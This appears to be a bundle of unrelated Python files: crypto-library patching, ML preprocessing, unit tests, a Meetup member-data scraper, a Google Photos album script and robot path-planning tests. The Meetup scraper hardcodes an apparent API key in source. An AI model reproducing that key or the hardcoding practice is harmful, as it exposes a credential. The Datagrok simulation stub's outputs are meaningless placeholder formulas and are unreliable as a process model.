r = secp256k1.secp256k1.secp256k1_ec_pubkey_parse(
secp256k1.secp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
if not r:
return False
return 1 == secp256k1.secp256k1.secp256k1_ecdsa_verify(secp256k1.secp256k1.ctx, sig, hash.to_bytes(32, byteorder="big"), pubkey)
# save new functions so that we can (re-)do patching
_patched_functions.fast_sign = sign
_patched_functions.fast_verify = verify
_patched_functions.fast_mul = mul
_patched_functions.prepared_to_patch = True
def do_monkey_patching_of_python_ecdsa_internals_with_libsecp256k1():
if not secp256k1.secp256k1:
print_msg('[ecc] info: libsecp256k1 library not available, falling back to python-ecdsa. '
'This means signing operations will be slower. '
'Try running:\n\n $ contrib/make_secp\n\n(You need to be running from the git sources for contrib/make_secp to be available)'
)
return
if not _patched_functions.prepared_to_patch:
raise Exception("can't patch python-ecdsa without preparations")
ecdsa.ecdsa.Private_key.sign = _patched_functions.fast_sign
ecdsa.ecdsa.Public_key.verifies = _patched_functions.fast_verify
ecdsa.ellipticcurve.Point.__mul__ = _patched_functions.fast_mul
# ecdsa.ellipticcurve.Point.__add__ = ... # TODO??
_patched_functions.monkey_patching_active = True
#print_error('[ecc] info: libsecp256k1 library found and will be used for ecdsa signing operations.')
def undo_monkey_patching_of_python_ecdsa_internals_with_libsecp256k1():
if not secp256k1.secp256k1:
return
if not _patched_functions.prepared_to_patch:
raise Exception("can't patch python-ecdsa without preparations")
ecdsa.ecdsa.Private_key.sign = _patched_functions.orig_sign
ecdsa.ecdsa.Public_key.verifies = _patched_functions.orig_verify
ecdsa.ellipticcurve.Point.__mul__ = _patched_functions.orig_mul
_patched_functions.monkey_patching_active = False
def is_using_fast_ecc():
return _patched_functions.monkey_patching_active
_prepare_monkey_patching_of_python_ecdsa_internals_with_libsecp256k1()
|
from __future__ import annotations
from rich.console import RenderableType
from rich.padding import Padding, PaddingDimensions
from rich.style import StyleType
from rich.styled import Styled
from ..widget import Widget
class Static(Widget):
def __init__(
self,
renderable: RenderableType,
name: str | None = None,
style: StyleType = "",
padding: PaddingDimensions = 0,
) -> None:
super().__init__(name)
self.renderable = renderable
self.style = style
self.padding = padding
def render(self) -> RenderableType:
renderable = self.renderable
if self.padding:
renderable = Padding(renderable, self.padding)
return Styled(renderable, self.style)
async def update(self, renderable: RenderableType) -> None:
self.renderable = renderable
self.refresh()
|
import torch.utils.model_zoo as model_zoo
import torch
import numpy as np
from collections import OrderedDict
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
r50=model_zoo.load_url(model_urls['resnet50'])
rr50=OrderedDict()
nk0={'conv1':'0','bn1':'1'}
bb=np.array([3,4,6,3])
#old_key=
for i,_ in enumerate(range(len(r50))):
k, v = r50.popitem(False)
#print(i,k)
key=k.split('.')
nk=''
if key[0] in nk0.keys():
key[0]=nk0[key[0]]
nk=".".join(key)
r50[nk]=v
elif key[0].startswith('layer'):
layer=int(key[0][-1])-1
key[0]= str(bb[:layer].sum()+int(key[1])+4)
del key[1]
nk=".".join(key)
r50[nk]=v
print(i,nk,k)
torch.save(r50, 'resnet50.pth')
|
import unittest
from scipy.stats import ttest_ind, pearsonr, ks_2samp
from utils import prepare_data
class TestExercise2_04(unittest.TestCase):
def setUp(self):
self.data = prepare_data()
self.data["Disease"] = self.data["Reason for absence"].apply(self.in_icd)
def in_icd(self, val):
return "Yes" if val >= 1 and val <= 21 else "No"
def test_pearson(self):
pearson_test = pearsonr(self.data["Age"], self.data["Absenteeism time in hours"])
self.assertAlmostEqual(pearson_test[0], 0.065, places=2)
self.assertAlmostEqual(pearson_test[1], 0.073, places=2)
def test_means(self):
means = self.data[["Disease", "Age"]].groupby("Disease").mean()
self.assertAlmostEqual(means["Age"]["Yes"], 36.652, places=2)
self.assertAlmostEqual(means["Age"]["No"], 36.338, places=2)
def test_ks(self):
disease_mask = self.data["Disease"] == "Yes"
disease_ages = self.data["Age"][disease_mask]
no_disease_ages = self.data["Age"][~disease_mask]
test_res = ttest_ind(disease_ages, no_disease_ages)
ks_res = ks_2samp(disease_ages, no_disease_ages)
self.assertAlmostEqual(test_res[0], 0.629, places=2)
self.assertAlmostEqual(test_res[1], 0.529, places=2)
self.assertAlmostEqual(ks_res[0], 0.056, places=2)
self.assertAlmostEqual(ks_res[1], 0.618, places=2)
|
import pandas as pd
import numpy as np
import requests
import os
import json
import matplotlib.pyplot as plt
from time import sleep
# Need to load an api-key
api_key = '646928682c4b5d6f5f6c782a6b351b29'
def get_all_groups(location_str, radius=25, write_path=None, api_key=api_key):
'''Gets a list of all groups within a set radius from a location. Returns a dataframe.'''
cols = ('group_id', 'group_name', 'num_members', 'category_id',
'category_name', 'organizer_id', 'group_urlname')
all_groups = pd.DataFrame(columns=cols)
for page in np.arange(10):
q = 'https://api.meetup.com/find/groups?&sign=true&location={}&radius={}&page=200&offset={}'.format(location_str, radius, page)
q += '&key={}'.format(api_key)
response = requests.get(q).json()
if len(response) > 0:
try:
for g in response:
s = pd.Series((g['id'], g['name'], g['members'], g['category']['id'],
g['category']['name'], g['organizer']['id'], g['urlname']),
index=cols)
all_groups = all_groups.append(s, ignore_index=True)
except KeyError as exc:
print(g['name'], exc)
# Sleep briefly so that API doesn't get overwhelmed
sleep(0.2)
all_groups = all_groups.astype({'group_id': int, 'organizer_id': int, 'category_id': int, 'num_members': int})
all_groups = all_groups.set_index('group_id')
# Write to computer
if write_path:
all_groups.to_csv(write_path, encoding='utf-8')
return all_groups
def get_group_members(group_id, api_key):
'''Accepts a Meetup group ID number and returns dataframe with all members in the group.'''
# Initialize variables
members = pd.DataFrame()
page = 0
bad_iters = 0
# Keep querying until there are no more results
all_results = False
while all_results == False:
q = 'https://api.meetup.com/2/members?'
q += '&sign=true&group_id={}&only=name,id,city,state,hometown,joined,visited,lat,lon&page=200&offset={}'.format(group_id, page)
q += '&key={}'.format(api_key)
response = requests.get(q).json()
if 'results' in response.keys():
if len(response['results']) == 0:
all_results = True
try:
tdf = pd.DataFrame.from_dict(response['results'])
members = members.append(tdf)
page += 1
except KeyError as exc:
all_results = True
bad_iters += 1
if bad_iters > 5:
all_results=True
pass
except json.decoder.JSONDecodeError:
bad_iters += 1
if bad_iters > 5:
all_results=True
pass
members['group_id'] = group_id
return members
def agg_group_members(list_of_group_ids, api_key, write_path=None, intermediate_path=None):
'''Retrieves member data for a list of MeetUp groups. Returns a dataframe with this information.'''
all_members = pd.DataFrame()
for g in list_of_group_ids:
sleep(1)
try:
tdf = get_group_members(g, api_key)
if intermediate_path:
tdf.to_csv('{}/{}.csv'.format(intermediate_path, g), encoding='utf-8')
all_members = all_members.append(tdf)
except KeyError as exc:
print(group, exc)
continue
# Write to computer
if write_path:
#for date_col in ['joined', 'visited']:
# members[date_col] = pd.to_datetime(members[date_col], unit='ms')
all_members.to_csv(write_path, encoding='utf-8')
return all_members
def get_events(urlname, date_filter_str=None, api_key=api_key):
''' Takes a Meetup group urlname and returns a DataFrame of events. Optionally, filter by date.'''
q = 'https://api.meetup.com/{}/events?'.format(urlname)
q += '&sign=true&page=200&status=past&only=id,name,status,time,yes_rsvp_count&desc=True'
q += '&{}'.format(api_key)
response = requests.get(q)
if response.status_code == 410:
raise ValueError('Group not accessible.')
if len(response.json()) == 0:
raise ValueError('No event results.')
events_df = pd.DataFrame.from_dict(response.json())
events_df.time = pd.to_datetime(events_df.time, unit='ms')
events_df['group_urlname'] = urlname
if date_filter_str:
events_df = events_df.loc[events_df.time > pd.to_datetime(date_filter_str)]
return events_df
def get_event_rsvps(urlname, event_id, api_key=api_key):
'''Accepts a group urlname and event id, and returns a dataframe of RSVPs.'''
q = 'https://api.meetup.com/{}/events/{}/rsvps?'.format(urlname, event_id)
q += '&sign=true&photo-host=public&response=yes&only=member'
q += '&{}'.format(api_key)
response = requests.get(q).json()
member_list = [(urlname, event_id, mem['member']['id']) for mem in response]
rsvp_df = pd.DataFrame(member_list, columns=['group_urlname', 'event_id', 'member_id'])
return rsvp_df
def get_all_event_rsvps(urlname, list_of_event_ids, api_key):
'''Accepts a group urlname and list of event ids, and returns a DataFrame of RSVPs. '''
all_rsvp_df = pd.DataFrame(columns=['group_urlname', 'event_id', 'member_id'])
for eid in list_of_event_ids:
tdf = get_event_rsvps(urlname, eid, api_key)
all_rsvp_df = all_rsvp_df.append(tdf, ignore_index=True)
return all_rsvp_df
def setup_graph_plot(**kwargs):
'''Creates an empty figure with one axis and requested input arguments. Removes the axis frame and sets X-Y aspect ratios to be equal. Returns a Matplotlib Figure and Axis object. '''
fig, ax = plt.subplots(1,1, **kwargs)
# Other graph settings
ax.tick_params(left=False, bottom=False, labelleft=False, labelbottom=False)
ax.set_aspect(1)
ax.set_frame_on(False)
return fig, ax |
#name: Fab Arm Exchange
#language: python
#tags: model, simulation
#meta.modality: Antibody
#meta.domain: Manufacturing
#input: double meaConcentration = 60 {category:FAE Reaction Parameters; units:mM; caption:2-MEA Concentration} [2-MEA Concentration]
#input: double phOfFaeReaction = 7.5 {category:FAE Reaction Parameters; caption:pH of FAE Reaction} [pH of FAE Reaction]
#input: double faeReactionTime = 3 {category:FAE Reaction Parameters; units:hr; caption:FAE Reaction Time} [FAE Reaction Time]
#input: double ionicStrenght = 100 {category:FAE Reaction Parameters; units:mM} [Ionic Strenght]
#input: double targetIgGConc = 10.5 {category:FAE Reaction Parameters; units:mg/ml; caption:Target IgG Conc} [Target IgG Conc]
#input: double massOverload = 1.05 {category:FAE Reaction Parameters; caption:Mass Overload (mAb1/mAb2)} [Mass Overload (mAb1/mAb2)]
#input: double P1MW = 148882 {category:FAE Reaction Parameters; units:mol/g; caption:Parental 1 MW} [Parental 1 MW]
#input: double reactionVolume = 0.5 {category:FAE Reaction Parameters; units:L} [Reaction Volume]
#input: double partialPressureOfOxygen = 0.21 {category:FAE Reaction Parameters; caption:Partial Pressure of Oxygen} [Partial Pressure of Oxygen]
#input: double doInitial = 0.9 {category:FAE Reaction Parameters; caption:DO (Initial)} [DO (Initial)]
#input: double doBuffer = 0.9 {category:FAE Reaction Parameters; caption:DO (Buffer)} [DO (Buffer)]
#input: double oxygenTransferRate = 0.443 {category:FAE Reaction Parameters; units:1/hr; caption:Oxygen Transfer rate} [Oxygen Transfer rate]
#input: double pressure = 1 {category:FAE Reaction Parameters; units:Bar} [Pressure]
#input: double temperature = 25 {category:FAE Reaction Parameters; units:C} [Temperature]
#input: bool Lid = False {category:FAE Reaction Parameters; caption:Lid (False=Closed, True=Opened)} [Lid (False=Closed, True=Opened)]
#input: double headSpace = 0.5 {category:FAE Reaction Parameters; units:L} [Head Space]
#input: double dfVolume = 12 {category:DF 1 Parameters; units:DV; caption:DF Volume} [DF Volume]
#input: double filterateRateDF = 10 {category:DF 1 Parameters; units:ml/min; caption:Filterate Rate (DF)} [Filterate Rate (DF)]
#input: double phOfUfdfBuffer = 7.5 {category:DF 1 Parameters; caption:pH of UFDF Buffer} [pH of UFDF Buffer]
#input: double phOfSecondUfdfBuffer = 7.5 {category:DF 2 Parameters (if any); caption:pH of 2nd UFDF Buffer} [pH of 2nd UFDF Buffer]
#input: double secondDfVolume = 0 {category:DF 2 Parameters (if any); units:DV; caption:2nd DF Volume} [2nd DF Volume]
#input: double dfConcentration = 30 {category: UF Parameters; caption:DF Concentration} [DF Concentration]
#input: double filterateRateUf = 10 {category: UF Parameters; units:ml/min; caption:Filterate Rate (UF)} [Filterate Rate (UF)]
#input: double holdTime = 0 {category:Hold Times Parameters (if any); units:hr} [Hold Time]
#input: double phDuringHoldTime = 7.5 {category:Hold Times Parameters (if any); caption:pH During Hold Time} [pH During Hold Time]
#input: double holdTime2 = 0 {category:Hold Times Parameters (if any); units:hr; caption:2nd Hold Time} [2nd Hold Time]
#input: double phDuringSecondHoldTime = 7.5 {category:Hold Times Parameters (if any); caption:pH During 2nd Hold Time} [pH During 2nd Hold Time]
#output: double c { category: Group A }
#output: double d { category: Group B }
c = holdTime + phOfSecondUfdfBuffer * massOverload
d = dfConcentration * phOfFaeReaction - meaConcentration |
from .tictactoe.tictactoe import env, raw_env
|
import glob
import os
import pandas as pd
from tensorflow.keras.models import load_model
from configs import config_roi
from utils.util import *
# Load model
model = load_model(config_roi.ROI_MODEL_PATH, compile=False)
# Load CSV with image files list
data = pd.read_csv(config_roi.IMAGES_CSV_PATH)
images_list = list(data['image_name'])
for img_path in glob.glob(os.path.join(config_roi.IMAGES_TO_EXTRACT_ROI_PATH, '*.png')):
file_name = os.path.basename(img_path)
if file_name in images_list:
# Load and process image
print(file_name)
img_name, img_extension = os.path.splitext(file_name)
img = read_image(img_path, aspect_ratio='square') # (h,w,3)
img_processed = preprocess_image(img, resize=True, size=224, equalize=True) # (h,w,3)
img_original = preprocess_image(img, resize=False, equalize=True)
# Predict ROI
pred = model.predict(np.expand_dims(img_processed, 0))
pred = pred.squeeze(0)
pred = pred.squeeze(-1)
pred = cv2.resize(pred, (img_original.shape[:2]))
# Obtain contours of ROI
ret, thresh = cv2.threshold(pred, 0.5, 1, 0)
thresh = 255 * thresh # scale by 255
thresh = thresh.astype(np.uint8)
contours, hierarchy = cv2.findContours(thresh, mode=cv2.cv2.RETR_TREE, method=cv2.CHAIN_APPROX_SIMPLE)
# Find the largest contour by area
areas = [cv2.contourArea(c) for c in contours]
contours_sorted = [x for _, x in sorted(zip(areas, contours), reverse=True)]
contours_max = contours_sorted[:1]
# Make image uint8
pred *= 255
pred = pred.astype(np.uint8)
# Obtain center and size of square bounding box that contains ROI
for cnt in contours_sorted[:2]:
x, y, w, h = cv2.boundingRect(cnt)
# get the center and the radius
cx = x + w // 2
cy = y + h // 2
cr = max(w, h) // 2
roi = []
roi = img_original[cy - cr:cy + cr, cx - cr:cx + cr]
###########
if roi.size == 0:
print(f'{img_name} is empty')
break
# Crop ROI from original resolution, resize to 512x512 and save
# Left knee (located on the right hand side of the image) is flipped
# vertically to match Right knee orientation
# i.e. knee medial side is located on the left, lateral side on the right
if cx >= img_original.shape[1] // 2: # left knee
cv2.imwrite(f'{config_roi.ROI_SAVE_PATH}/{img_name}_L{img_extension}', cv2.resize(roi, (512, 512)))
else: # right knee
cv2.imwrite(f'{config_roi.ROI_SAVE_PATH}/{img_name}_R{img_extension}', cv2.flip(cv2.resize(roi, (512, 512)), 1))
# Add bounding box to image
cv2.rectangle(img_original, (cx - cr, cy - cr), (cx + cr, cy + cr), (0, 255, 0), 10)
# save original image resized to 512x512 with ROI bounding boxes
cv2.imwrite(f'{config_roi.ROI_VIZ_SAVE_PATH}/{img_name}_bbox{img_extension}', cv2.resize(img_original, (512, 512)))
|
# -*- coding: utf-8 -*-
from operator import add
from functools import partial
from collections import deque
from sys import float_info
from ..misc import call, callwith, raisef, pack, namelambda, timer, getattrrec, setattrrec, Popper, ulp
from ..fun import withself
def test():
# def as a code block (function overwritten by return value)
#
@call
def result():
return "hello"
assert result == "hello"
# use case 1: make temporaries fall out of scope
@call
def x():
a = 2 # many temporaries that help readability...
b = 3 # ...of this calculation, but would just pollute locals...
c = 5 # ...after the block exits
return a * b * c
assert x == 30
# use case 2: multi-break out of nested loops
@call
def result():
for x in range(10):
for y in range(10):
if x * y == 42:
return (x, y)
... # more code here
assert result == (6, 7)
# can also be used normally
assert call(add, 2, 3) == add(2, 3)
# to pass arguments when used as decorator, use @callwith instead
@callwith(3)
def result(x):
return x**2
assert result == 9
# specialize for given arguments, choose function later
apply23 = callwith(2, 3)
def myadd(a, b):
return a + b
def mymul(a, b):
return a * b
assert apply23(myadd) == 5
assert apply23(mymul) == 6
# callwith is not essential; we can do the same pythonically like this:
a = [2, 3]
assert myadd(*a) == 5
assert mymul(*a) == 6
# build up the argument list as we go
# - note curry does not help, must use partial; this is because curry
# will happily call "callwith" (and thus terminate the gathering step)
# as soon as it gets at least one argument.
p1 = partial(callwith, 2)
p2 = partial(p1, 3)
p3 = partial(p2, 4)
apply234 = p3() # terminate gathering step by actually calling callwith
def add3(a, b, c):
return a + b + c
def mul3(a, b, c):
return a * b * c
assert apply234(add3) == 9
assert apply234(mul3) == 24
# pythonic solution:
a = [2]
a += [3]
a += [4]
assert add3(*a) == 9
assert mul3(*a) == 24
# callwith in map, if we want to vary the function instead of the data
m = map(callwith(3), [lambda x: 2*x, lambda x: x**2, lambda x: x**(1/2)])
assert tuple(m) == (6, 9, 3**(1/2))
# pythonic solution - use comprehension notation:
m = (f(3) for f in [lambda x: 2*x, lambda x: x**2, lambda x: x**(1/2)])
assert tuple(m) == (6, 9, 3**(1/2))
l = lambda: raisef(ValueError, "all ok")
try:
l()
except ValueError:
pass
else:
assert False
myzip = lambda lol: map(pack, *lol)
lol = ((1, 2), (3, 4), (5, 6))
assert tuple(myzip(lol)) == ((1, 3, 5), (2, 4, 6))
square = lambda x: x**2
assert square.__code__.co_name == "<lambda>"
assert square.__name__ == "<lambda>"
assert square.__qualname__ == "test.<locals>.<lambda>"
square = namelambda("square")(square)
assert square.__code__.co_name == "square"
assert square.__name__ == "square"
assert square.__qualname__ == "test.<locals>.square"
# CAUTION: in case of nested lambdas, the inner doesn't see the outer's new name:
nested = namelambda("outer")(lambda: namelambda("inner")(withself(lambda self: self)))
assert nested.__qualname__ == "test.<locals>.outer"
assert nested().__qualname__ == "test.<locals>.<lambda>.<locals>.inner"
# simple performance timer as a context manager
with timer() as tictoc:
for _ in range(int(1e6)):
pass
assert tictoc.dt > 0 # elapsed time in seconds (float)
with timer(p=True): # auto-print mode for convenience
for _ in range(int(1e6)):
pass
# access underlying data in an onion of wrappers
class Wrapper:
def __init__(self, x):
self.x = x
w = Wrapper(Wrapper(42))
assert type(getattr(w, "x")) == Wrapper
assert type(getattrrec(w, "x")) == int
assert getattrrec(w, "x") == 42
setattrrec(w, "x", 23)
assert type(getattr(w, "x")) == Wrapper
assert type(getattrrec(w, "x")) == int
assert getattrrec(w, "x") == 23
# pop-while iterator
inp = deque(range(5)) # efficiency: deque can popleft() in O(1) time
out = []
for x in Popper(inp):
out.append(x)
assert inp == deque([])
assert out == list(range(5))
inp = deque(range(3))
out = []
for x in Popper(inp):
out.append(x)
if x < 10:
inp.appendleft(x + 10)
assert inp == deque([])
assert out == [0, 10, 1, 11, 2, 12]
# works for a list, too, although not efficient (pop(0) takes O(n) time)
inp = list(range(5))
out = []
for x in Popper(inp):
out.append(x)
assert inp == []
assert out == list(range(5))
# Unit in the Last Place, float utility
# https://en.wikipedia.org/wiki/Unit_in_the_last_place
eps = float_info.epsilon
assert ulp(1.0) == eps
# test also at some base-2 exponent switch points
assert ulp(2.0) == 2 * eps
assert ulp(0.5) == 0.5 * eps
print("All tests PASSED")
if __name__ == '__main__':
test()
|
import context; context.set_context()
import os
import sys
import logging
import util
import gphoto
from gphoto.google_library import GoogleLibrary
from gphoto.imageutils import ImageUtils
# -----------------------------------------------------
# Main
# -----------------------------------------------------
def main():
"""
Specify the year in which to narrow the search of images belonging to an album
"""
if len(sys.argv) < 2:
logging.error("Too few arguments. See help")
return
# Get arguments
arg_year = sys.argv[1]
GoogleLibrary.load_library()
google_cache = GoogleLibrary.cache()
google_album_ids = google_cache['album_ids']
google_album_titles = google_cache['album_titles']
google_image_ids = google_cache['image_ids']
google_image_filenames = google_cache['image_filenames']
google_album_images = google_cache['album_images']
google_image_albums = google_cache['image_albums']
result_no_dateshot = []
result_albums = {}
result = {
'no-dateshot': result_no_dateshot,
'albums': result_albums
}
# Get dateshot. If not there then report it
for google_image_id, google_image in google_image_ids.items():
dateShot = None
image_metadata = google_image.get('mediaMetadata')
if image_metadata:
dateShot = image_metadata.get('creationTime')
if dateShot is None:
result_no_dateshot.append({
'id': google_image_id,
'productUrl': google_image.get('productUrl')
})
continue
# We have a dateshot. parse it and get the year
# If year does not math then ignore the image
image_year = dateShot.split('-')[0]
if arg_year != image_year:
continue
# Get its google album and add it to the result
google_image_album_object = google_image_albums.get(google_image_id)
if google_image_album_object is None or len(google_image_album_object) <= 0:
continue
# This image has albums. Add the albums to the results
# and add the image to the albums
for google_album_id in google_image_album_object:
result_album = result_albums.get(google_album_id)
result_album_images = None
if result_album is None:
google_album = google_album_ids.get(google_album_id)
result_album_images = []
result_album = {
'id': google_album_id,
'title': google_album.get('title'),
'productUrl': google_album.get('productUrl'),
'shared': google_album.get('shared'),
'images': result_album_images
}
result_albums[google_album_id] = result_album
else:
result_album_images = result_album.get('images')
result_album_images.append((google_image_id, google_image.get('productUrl')))
# result_album_images.append({
# 'id': google_image_id,
# 'productUrl': google_image.get('productUrl')
# })
gphoto.save_to_file(result, f"google_images_belonging_to_album_in_year_{arg_year}.json")
if __name__ == '__main__':
main() |
from openslides_backend.permissions.permissions import Permissions
from tests.system.action.base import BaseActionTestCase
class ProjectorAddToPreview(BaseActionTestCase):
def setUp(self) -> None:
super().setUp()
self.set_models(
{
"meeting/1": {"is_active_in_organization_id": 1},
"meeting/2": {"is_active_in_organization_id": 1},
"assignment/1": {"meeting_id": 1},
"projector/1": {"meeting_id": 1, "preview_projection_ids": [10]},
"projector/2": {"meeting_id": 1, "preview_projection_ids": [11, 12]},
"projector/3": {"meeting_id": 1},
"projector/4": {"meeting_id": 2},
"projection/10": {
"meeting_id": 1,
"content_object_id": "assignment/1",
"preview_projector_id": 1,
"weight": 10,
},
"projection/11": {
"meeting_id": 1,
"content_object_id": "assignment/1",
"preview_projector_id": 2,
"weight": 20,
},
"projection/12": {
"meeting_id": 1,
"content_object_id": "assignment/1",
"preview_projector_id": 2,
"weight": 30,
},
}
)
def test_add_to_preview(self) -> None:
response = self.request(
"projector.add_to_preview",
{"ids": [1, 2], "content_object_id": "assignment/1", "stable": False},
)
self.assert_status_code(response, 200)
projector_1 = self.get_model("projector/1")
assert projector_1.get("preview_projection_ids") == [10, 13]
projector_2 = self.get_model("projector/2")
assert projector_2.get("preview_projection_ids") == [11, 12, 14]
projection_13 = self.get_model("projection/13")
assert projection_13.get("preview_projector_id") == 1
assert projection_13.get("content_object_id") == "assignment/1"
assert projection_13.get("weight") == 11
projection_14 = self.get_model("projection/14")
assert projection_14.get("preview_projector_id") == 2
assert projection_14.get("content_object_id") == "assignment/1"
assert projection_14.get("weight") == 31
def test_add_to_preview_empty_projector(self) -> None:
response = self.request(
"projector.add_to_preview",
{"ids": [3], "content_object_id": "assignment/1", "stable": False},
)
self.assert_status_code(response, 200)
projector_1 = self.get_model("projector/3")
assert projector_1.get("preview_projection_ids") == [13]
projection_13 = self.get_model("projection/13")
assert projection_13.get("preview_projector_id") == 3
assert projection_13.get("content_object_id") == "assignment/1"
assert projection_13.get("weight") == 2
def test_add_to_preview_non_unique_ids(self) -> None:
response = self.request(
"projector.add_to_preview",
{"ids": [1, 1], "content_object_id": "assignment/1", "stable": False},
)
self.assert_status_code(response, 400)
assert "data.ids must contain unique items" in response.json["message"]
def test_add_to_preview_check_meeting_id(self) -> None:
response = self.request(
"projector.add_to_preview",
{"ids": [4], "content_object_id": "assignment/1", "stable": False},
)
self.assert_status_code(response, 400)
self.assertIn(
"The following models do not belong to meeting 1: ['projector/4']",
response.json["message"],
)
def test_add_to_preview_no_permission(self) -> None:
self.base_permission_test(
{},
"projector.add_to_preview",
{"ids": [1, 2], "content_object_id": "assignment/1", "stable": False},
)
def test_add_to_preview_permission(self) -> None:
self.base_permission_test(
{},
"projector.add_to_preview",
{"ids": [1, 2], "content_object_id": "assignment/1", "stable": False},
Permissions.Projector.CAN_MANAGE,
)
|
import sys
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import time
import argparse
from visual_utils import generate_listcol, generate_cmap
if __name__ == '__main__':
# Check for command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('--basename', type=str, default='exp_20200220_bosehubbard')
parser.add_argument('--res', type=str, default='results')
parser.add_argument('--dim', type=int, default=0)
parser.add_argument('--stats', type=int, default=1)
args = parser.parse_args()
print(args)
resname, basename, d = args.res, args.basename, args.dim
typestats = args.stats
labels = ['Pentropy', 'Pnorm', 'Diff']
#plt.style.use('seaborn-colorblind')
plt.rc('font', family='serif')
plt.rc('mathtext', fontset='cm')
plt.rcParams['font.size'] = 20
cols = generate_listcol(option=1)
def minmax_norm(a):
return (a - np.min(a))/(np.max(a) - np.min(a))
mk = 'o'
lstyle = 'dashed'
sz=80
alpha=0.7
Ls = dict()
Ls['high'] = [300, 400, 500, 600, 700]
Ls['mid'] = [30, 40, 50, 60, 70]
Ls['low'] = [12, 14, 16, 18, 20]
Ls['all'] = [30, 40, 50, 60, 70, 80, 200, 300, 400, 500, 600, 700]
Ls['all2'] = [12, 14, 16, 18, 20, 40, 50, 60, 70, 80, 300, 400, 500, 600, 700]
for lb in ['all', 'all2']:
fig, ax = plt.subplots()
ax.set_xlabel(r"Tunneling " r"$J/U$", fontsize=28)
ax.set_ylabel(labels[typestats], fontsize=28)
for i in range(len(Ls[lb])):
L = Ls[lb][i]
if lb == 'all':
if L < 100:
c = cols[0]
else:
c = cols[1]
else:
c = cols[int(i/5)]
statsfile = '{}_L_{}_stats_dim_{}.txt'.format(basename, L, d)
statsfile = os.path.join(resname, statsfile)
print(statsfile)
if os.path.isfile(statsfile):
arr = np.loadtxt(statsfile)
print(arr.shape)
glist, npent_list, pnorm_list = arr[:, 0], arr[:, 1], arr[:, 3]
npent_list = minmax_norm(npent_list)
pnorm_list = minmax_norm(pnorm_list)
# normalize
if typestats == 0:
vals_list = npent_list
elif typestats == 1:
vals_list = pnorm_list
else:
vals_list = abs(npent_list - pnorm_list)
ax.plot(glist, vals_list, linestyle=lstyle, markersize=8, color=c, alpha=alpha, linewidth=4.0, label = 'L-{}'.format(L))
#ax.scatter(glist, vals_list, s=sz, cmap=cm, alpha=alpha, edgecolor='k', linewidths='1', label = 'L-{}'.format(L))
ax.tick_params(direction='in', length=8)
#ax.legend(fontsize=18)
for figtype in ['png', 'pdf', 'svg']:
fig_ofile = os.path.join(resname, '{}_{}_agg_{}_fig_dim_{}.{}'.format(basename, lb, typestats, d, figtype))
plt.savefig(fig_ofile, bbox_inches='tight', format=figtype)
|
import numpy as np
import matplotlib.pyplot as plt
from time import sleep
from grid_map import StochOccupancyGrid2DLazy
from global_planners import AstarPlanner, NavFuncitonPlanner
from local_planners import DynamicWindowPlanner
from source.actors.simulated_human import SimulatedPathFollowingHuman
from source.actors.simulated_robot import SimulatedDetRobot
from utils import SimpleObstacle
def test_global_planner():
# list of obstacles
obstacles = [((6, 6), (8, 7)), ((2, 1), (4, 2)), ((2, 4), (4, 6)), ((6, 2), (8, 4))]
width = 10
height = 10
map_resolution = 0.05
plan_resolution = 0.25
# generate initial probabilities
probs = -np.ones((int(width * height / map_resolution ** 2 + 0.5),))
# probs = -np.ones((int(height / map_resolution), int(width / map_resolution)))
# set goals
x_init = (0, 0)
x_goal = (8, 8)
# create a 2D stochastic occupancy grid
occupancy = StochOccupancyGrid2DLazy(map_resolution, int(width / map_resolution), int(height / map_resolution),
0, 0, int(plan_resolution / map_resolution) * 1, probs)
occupancy.from_obstacles(obstacles)
occupancy.compute_free_states()
# create a nav function planner and an astar planner
# planner_astar = AstarPlanner((0, 0), (10, 10), x_init, x_goal, occupancy)
planner_nav = NavFuncitonPlanner((0, 0), (10, 10), x_init, x_goal, occupancy, plan_resolution)
# solve for path
# planner_astar.solve(verbose=True)
planner_nav.solve(verbose=True)
planner_nav.reconstruct_path()
# plot result
# planner_astar.visualize_path()
planner_nav.visualize_path()
planner_nav.reconstruct_path(np.array([7, 5]))
planner_nav.visualize_path()
def test_dwa_planner():
# the environment
obstacles = [((0.5, 1.5), (1.5, 3.5)), ((3.5, 1.5), (4.5, 3.5))]
width = 5
height = 5
map_resolution = 0.05
plan_resolution = 0.25
# generate initial probabilities
probs = -np.ones((int(width * height / map_resolution ** 2 + 0.5),))
# create a 2D stochastic occupancy grid
occupancy = StochOccupancyGrid2DLazy(map_resolution, int(width / map_resolution), int(height / map_resolution),
0, 0, int(plan_resolution / map_resolution) * 1, probs)
occupancy.from_obstacles(obstacles)
occupancy.compute_free_states(0.2)
# set goals
x_init = (0.75, 0.75, 0.0)
x_goal = (4.25, 4.25, 0.0)
# construct a global planner
planner_nav = NavFuncitonPlanner((0, 0), (width, height), x_init[0:2],
x_goal[0:2], occupancy, plan_resolution)
# get global plan
planner_nav.solve(verbose=True)
planner_nav.reconstruct_path()
# visualize path
# create a plot axis
fig, ax = plt.subplots()
ax.set_aspect('equal')
ax.set_xlim(0, width)
ax.set_ylim(0, height)
plt.ion()
planner_nav.visualize_path(ax)
plt.pause(1)
# create a robot
default_robot_size = 0.2
robot = SimulatedDetRobot(fp_radius=default_robot_size, pose_init=x_init)
# create a human
human0 = SimulatedPathFollowingHuman(fp_radius=0.2)
traj = np.array([[0.0, 3.1, 1.5, np.pi / 2.0],
[20.0, 3.1, 3.5, np.pi / 2.0]])
human0.load_trajectory(traj=traj)
# show the robot and human
robot.plot(ax)
human0.plot(ax)
plt.pause(0.1)
# create a local planner
dt_local_planner = 0.1
planner_dwa = DynamicWindowPlanner(0.2, 5,
global_planner=planner_nav,
robot_radius=default_robot_size)
# starts simulation
# simulation at 100hz
t_curr = 0.0
dt = 0.01
dt_plot = 0.05
r_local_planner = int(dt_local_planner / dt)
r_plot = int(dt_plot / dt)
for k in range(1500):
# update cmd_vel
if k % r_local_planner == 0:
# update sensor information
obs_list = []
obs = SimpleObstacle(human0.get_pose(), (0.0, 0.0), 0.2)
obs_list.append(obs)
# run planner
planner_dwa.update_obstacles(obs_list)
